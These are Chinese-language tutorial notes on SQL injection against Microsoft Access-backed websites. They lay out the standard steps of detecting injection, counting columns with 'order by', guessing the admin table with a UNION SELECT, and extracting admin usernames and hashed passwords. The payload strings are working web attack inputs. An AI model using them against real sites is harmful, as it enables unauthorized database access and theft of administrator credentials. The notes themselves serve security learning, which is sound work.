access联合查询
常见数据库搭配
上面几种搭配都是可以混搭的
access数据库结构
access数据库的结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。
测试SQL注入
access注入基本流程:
- 1.判断有无注入
2.猜解表名
3.猜解字段
4.猜解管理员ID值
5.猜解用户名和密码长度
6.猜解用户名和密码
判断注入
and 1=1 and 1=2 ——判断注入 显示正常
说明这里的代码都带入到了数据库执行 存在注入
order by 22 ——猜有多少列(22正确,23错误,则为22个)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin ——猜表名(报错说明表名不存在,将admin换成别的继续猜)
这种情况下存在admin表 就可以试着查询admin表里的字段,因为显示的是3,5所以就可以在这两个位置查询想要查询的字段 这样就查到了admin 和 password 但密码是经过加密的 需要解密